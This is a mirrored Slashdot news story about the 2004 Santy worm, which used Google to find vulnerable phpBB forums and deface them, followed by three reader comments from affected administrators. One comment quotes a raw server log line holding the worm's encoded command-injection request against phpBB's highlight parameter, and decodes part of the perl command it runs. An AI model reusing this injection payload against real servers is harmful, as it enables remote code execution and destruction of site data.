Slashdot Mirror

← Back to Stories (view on slashdot.org)

Net Worm Uses Google to Spread

Posted by michael on from the web-service-takes-on-new-meaning dept.

troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist if you use Microsoft's Search engine to scan for the phrase 'NeverEverNoSanity'-- part of the defacement text that the Santy worm uses to replace files on infected Web sites--returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.

3 of 309 comments (clear)

  1. Under the Google radar by Meostro · · Score: 5, Interesting

    I saw this yesterday on a.... uhh... "anatomic reference" site:
    This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

    I tried to find some kind of reference and Googled for it, but I got no results.

    Still nothing on it, wonder how long it'll be before it shows up?

    MSN search returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta engine for the article.

  2. I got hit HARD! :( by Broadband · · Score: 5, Interesting

    This worm is unbelieveably evil.

    What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extentions and overwrites them with the 264 byte file that simply states "Web site defaced"

    I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

    I've been spening the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

    If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before i get that site back online.

    -BB

  3. This one's fun to debug - perl via url by falzbro · · Score: 5, Interesting
    I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

    This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

    Here's the first line from the logfile:
    [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca 3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)% 252echr(101)%252echr(114)%252echr(108)%252echr(32) %252echr(45)%252echr(101)%252echr(32)%252echr(34)% 252echr(111)%252echr(112)%252echr(101)%252echr(110 )%252echr(32)%252echr(79)%252echr(85)%252echr(84)% 252echr(44)%252echr(113)%252echr(40)%252echr(62)%2 52echr(109)%252echr(49)%252echr(104)%252echr(111)% 252echr(50)%252echr(111)%252echr(102)%252echr(41)% 252echr(32)%252echr(97)%252echr(110)%252echr(100)% 252echr(32)%252echr(112)%252echr(114)%252echr(105) %252echr(110)%252echr(116)%252echr(32)%252echr(113 )%252echr(40)%252echr(72)%252echr(89)%252echr(118) %252echr(57)%252echr(112)%252echr(111)%252echr(52) %252echr(122)%252echr(51)%252echr(106)%252echr(106 )%252echr(72)%252echr(87)%252echr(97)%252echr(110) %252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid= 2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%2 52Esystem(chr(112)%252echr(101)%252echr(114)%252ec hr(108)%252echr(32)%252echr(45)%252echr(101)%252ec hr(32)%252echr(34)%252echr(111)%252echr(112)%252ec hr(101)%252echr(110)%252echr(32)%252echr(79)%252ec hr(85)%252echr(84)%252echr(44)%252echr(113)%252ech r(40)%252echr(62)%252echr(109)%252echr(49)%252echr (104)%252echr(111)%252echr(50)%252echr(111)%252ech r(102)%252echr(41)%252echr(32)%252echr(97)%252echr (110)%252echr(100)%252echr(32)%252echr(112)%252ech r(114)%252echr(105)%252echr(110)%252echr(116)%252e chr(32)%252echr(113)%252echr(40)%252echr(72)%252ec hr(89)%252echr(118)%252echr(57)%252echr(112)%252ec hr(111)%252echr(52)%252echr(122)%252echr(51)%252ec hr(106)%252echr(106)%252echr(72)%252echr(87)%252ec hr(97)%252echr(110)%252echr(78)%252echr(41)%252ech r(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    If you decode the ascii characters, you get:

    perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

    I didn't have enough freetime to decode the whole thing due to.. actual work having to be done, but it's quite clever.

    --falz